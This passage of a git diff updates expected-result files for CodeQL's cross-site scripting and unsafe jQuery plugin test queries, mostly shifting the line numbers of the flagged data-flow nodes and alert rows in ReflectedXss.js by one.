s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | -| ReflectedXss.js:122:33:122:43 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:7:33:7:45 | req.params.id | semmle.label | req.params.id | +| ReflectedXss.js:16:12:16:39 | "Unknow ... 
rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:16:31:16:39 | params.id | semmle.label | params.id | +| ReflectedXss.js:21:12:21:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | semmle.label | marked(req.body) | +| ReflectedXss.js:22:19:22:26 | req.body | semmle.label | req.body | +| ReflectedXss.js:28:12:28:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:40:12:40:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | semmle.label | convert ... q.body) | +| ReflectedXss.js:41:31:41:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:55:12:55:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:14:63:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:39:63:42 | file | semmle.label | file | +| ReflectedXss.js:64:16:64:19 | file | semmle.label | file | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | semmle.label | remark( ... tring() | +| ReflectedXss.js:67:33:67:40 | req.body | semmle.label | req.body | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | semmle.label | unified ... q.body) | +| ReflectedXss.js:71:12:71:65 | unified ... oString | semmle.label | unified ... 
oString | +| ReflectedXss.js:71:48:71:55 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:20:73:27 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:34:73:34 | f | semmle.label | f | +| ReflectedXss.js:74:14:74:14 | f | semmle.label | f | +| ReflectedXss.js:82:12:82:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | +| ReflectedXss.js:83:22:83:29 | req.body | semmle.label | req.body | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | +| ReflectedXss.js:84:23:84:30 | req.body | semmle.label | req.body | +| ReflectedXss.js:96:12:96:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:97:30:97:37 | req.body | semmle.label | req.body | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:99:31:99:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | semmle.label | markdow ... 
q.body) | +| ReflectedXss.js:102:76:102:83 | req.body | semmle.label | req.body | +| ReflectedXss.js:109:16:109:30 | request.query.p | semmle.label | request.query.p | +| ReflectedXss.js:113:11:113:41 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | semmle.label | keys: queryKeys | +| ReflectedXss.js:115:11:115:45 | keys | semmle.label | keys | +| ReflectedXss.js:115:18:115:26 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | +| ReflectedXss.js:117:11:117:61 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | semmle.label | [keys] [0] | +| ReflectedXss.js:117:50:117:53 | keys | semmle.label | keys | +| ReflectedXss.js:117:58:117:61 | keys | semmle.label | keys | +| ReflectedXss.js:118:11:118:72 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:118:25:118:32 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | +| ReflectedXss.js:121:33:121:43 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... 
rams.id | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | semmle.label | req.params.id | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | 
@@ -335,28 +335,28 @@ nodes subpaths | ReflectedXssGood3.js:139:24:139:26 | url | ReflectedXssGood3.js:68:22:68:26 | value | ReflectedXssGood3.js:108:10:108:23 | parts.join('') | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | #select -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... 
rams.id | ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. 
| ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected index d29b35203b80..eae50c0243f9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected 
@@ -1,25 +1,25 @@ -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... 
rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected index f246b00d7878..b17ab0564834 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected 
@@ -169,17 +169,17 @@ subpaths | unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. 
| unsafe-jquery-plugin.js:65:19:69:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... ml);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 